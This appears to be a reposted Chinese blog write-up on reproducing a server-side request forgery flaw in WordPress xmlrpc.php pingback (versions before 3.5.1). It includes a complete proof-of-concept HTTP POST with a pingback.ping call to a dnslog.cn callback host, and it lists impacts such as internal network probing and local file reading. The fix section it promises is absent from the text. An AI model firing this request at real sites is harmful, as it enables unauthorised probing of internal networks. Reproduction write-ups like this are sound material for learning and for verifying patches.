本文整理自网络,侵删。
目录
- 一、漏洞介绍
- 二、漏洞影响
- 三、漏洞复现
- 四、深入利用
- 五、漏洞修复
一、漏洞介绍
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
二、漏洞影响
WordPress 版本< 3.5.1
造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等
三、漏洞复现
第一步:直接访问这个文件,初步判断
第二步:发现POC验证数据包
POST /xmlrpc.php HTTP/1.1 Host: www.目标.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 310 <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://g8o53x.dnslog.cn/</string></value></param> <param><value><string>http://www.目标.com/?p=1</string></value></param> </params> </methodCall>
发送数据包
验证成功 !
相关阅读 >>
wordpress全局变量$wpdb初始化并声明为全局变量的方法
ubuntu vps中wordpress网站打开时提示”建立数据库连接错误”的解决办法
安装完wordpress后你应该做好这24件事 安装wordpress后最佳化指南
wordpress分类,标签,分页显示及翻页出现404错误的解决方法
更多相关阅读请进入《wordpress》频道 >>
转载请注明出处:木庄网络博客 » 复现WordPressxmlrpc.php漏洞和SSRF的详细步骤
标签:wordpress
相关推荐
评论
管理员已关闭评论功能...